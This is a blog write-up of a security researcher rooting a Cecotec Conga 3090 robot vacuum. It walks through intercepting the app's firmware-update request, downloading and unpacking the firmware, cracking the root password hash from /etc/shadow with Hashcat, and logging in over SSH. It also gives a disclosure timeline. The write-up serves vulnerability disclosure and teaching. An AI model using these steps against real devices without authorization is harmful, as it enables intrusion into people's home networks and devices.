Hack your vacuum. Are we safe on IoT Things?

IoT devices are filling our houses these last days, so many Christmas gifts that can help us in our daily tasks, like remotely watching your baby or your pets, turning on the air conditioning or keeping the house floor clean but… are we safe to use these devices on our home network? Can someone hack my vacuum?

Let’s take a look at a very common device: Cecotec Conga 3090. It has had many sales (and many returns) and now replaced by the new model 3490

Today’s victim: Conga 3090

Conga 3090

This model was the Cecotec flagship until model 4090 was released and with a price of 350-400€ had a great impact on the automatic vacuum market.

Reconnaissance

Let’s check at first sight what it exposes on our LAN:

a really sweet ssh port there

It exposes a DNS service with dnsmasq and a SSH port with a Dropbear so, we need more info to get into there.

We now switch to Burp Suite just to make a HTTP(s) Proxy, route all phone traffic through it and see what the app can tell us. (You can follow a tutorial for this here)

Aaaaand surprise, we got a GET Request checking if there’s an update available for our product, and asking for the package ramdisk_sys that’s a good entry point! so lets forward this request to Repeater and check the parameters:

GET /device_update?product=CECOTECCRL20A-Release&version=S1.2.38&sn=<HereGoesASerialNumber>&pkg_name=ramdisk_sys HTTP/1.1
 Host: eu.ota.3irobotics.net:5000
 Accept: /
 User-Agent: SCCRobot/2.2.0 (es.cecotec.s3090v1; build:1; iOS 13.3.0) Alamofire/4.7.3
 Accept-Language: es-ES;q=1.0
 Accept-Encoding: gzip, deflate
 Connection: close

This request give us a HTTP 200 OK but an empty JSON {}, so maybe it’s because we have the last version installed?, Let’s try lowering the version to 1.2.34

Voilà, we now have the URI of the ramdisk package, let’s download it and inspect it

christian@kali:~/cecotec$ wget http://eu.ota.3irobotics.net:5000/static/ota_packages/CECOTECCRL20A-Release/S1.2.38/ramdisk_sys.tar.gz
 Resolviendo eu.ota.3irobotics.net (eu.ota.3irobotics.net)… 47.91.94.73, 47.254.145.60, 47.91.87.185
 Conectando con eu.ota.3irobotics.net (eu.ota.3irobotics.net)[47.91.94.73]:5000… conectado.
 Petición HTTP enviada, esperando respuesta… 200 OK
 Longitud: 23422553 (22M) [application/x-tar]
 Grabando a: “ramdisk_sys.tar.gz”
 ramdisk_sys.tar.gz                 100%[=============================================================>]  22,34M  1,03MB/s    en 21s     
 2020-01-05 13:43:06 (1,06 MB/s) - “ramdisk_sys.tar.gz” guardado [23422553/23422553]
 christian@kali:~/cecotec$ tar -xzvf ramdisk_sys.tar.gz 
 ramdisk_sys/
 ramdisk_sys/boot_initramfs.img.md5
 ramdisk_sys/boot_initramfs.img
 christian@kali:~/cecotec$ cd ramdisk_sys/
christian@kali:~/cecotec/ramdisk_sys$ ls -lah
 total 33M
 drwxr-xr-x 2 christian christian 4,0K sep 17 12:33 .
 drwxr-xr-x 3 christian christian 4,0K ene  5 13:43 ..
 -rw-r--r-- 1 christian christian  32M sep 17 12:33 boot_initramfs.img
 -rw-r--r-- 1 christian christian   33 sep 17 12:33 boot_initramfs.img.md5

Nice! that looks like we have a 32Mb initramfs image, therefore it’s time to let binwalk do it’s job:

christian@kali:~/cecotec/ramdisk_sys$ binwalk boot_initramfs.img

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
82432         0x14200         uImage header, header size: 64 bytes, header CRC: 0x9D836DC1, created: 2018-09-30 01:28:12, image size: 23381900 bytes, Data Address: 0x40008000, Entry Point: 0x40008000, data CRC: 0x8CA6E59A, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "ARM OpenWrt Linux-3.4.39"
82496         0x14240         Linux kernel ARM boot executable zImage (little-endian)
98643         0x18153         gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00 (null date)

Gaining access

We discovered that OpenWrt is the OS running inside the vacuum so we will try to decompress the image and get interesting data inside, starting by re-launching binwalk with –matryoshka and start rubbing your hands together while watching the entire file system decompress.

If you have a very quick view, you have surely seen a very interesting file: ./<folders>/etc/shadow that contains the root password hash (NOTE: trying to keep things a bit secure I’m not going to post the password hash or the password itself)

our first prize today

And… well… it’s a MD5 hash, and if we got a good videocard on our system therefore we can switch to Hashcat, using -m 500 ( md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)) and our favorite dictionary(like the CrackStation one) or an online service like OnlineHashCrack

Now that we have that sweetie password, let’s try to SSH in:

christian@kali:~$ ssh root@192.168.1.64
root@192.168.1.64's password: 


BusyBox v1.24.1 () built-in shell (ash)

 _____  _              __     _
|_   _||_| ___  _ _   |  |   |_| ___  _ _  _ _
  | |   _ |   ||   |  |  |__ | ||   || | ||_'_|
  | |  | || | || _ |  |_____||_||_|_||___||_,_|
  |_|  |_||_|_||_|_|  Tina is Based on OpenWrt!
 ----------------------------------------------
 Tina Linux (Neptune, 57513AA3)
 ----------------------------------------------
root@TinaLinux:~# 

We’re in!!!. Now I really beg you to update your vacuum root password everytime it gets an update because that password is the same on all Cecotec Conga 3090 models, for instance, anyone that get access to your Wifi, can hack your vacuum and install any persistence module there!

Timeline:

19/09/2019: Bug discovered
20/09/2019: Bug communicated by mail to Cecotec España
23/09/2019: Small conference with Cecotec IT Team
05/01/2020: This little guide came out

Etiquetas:

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *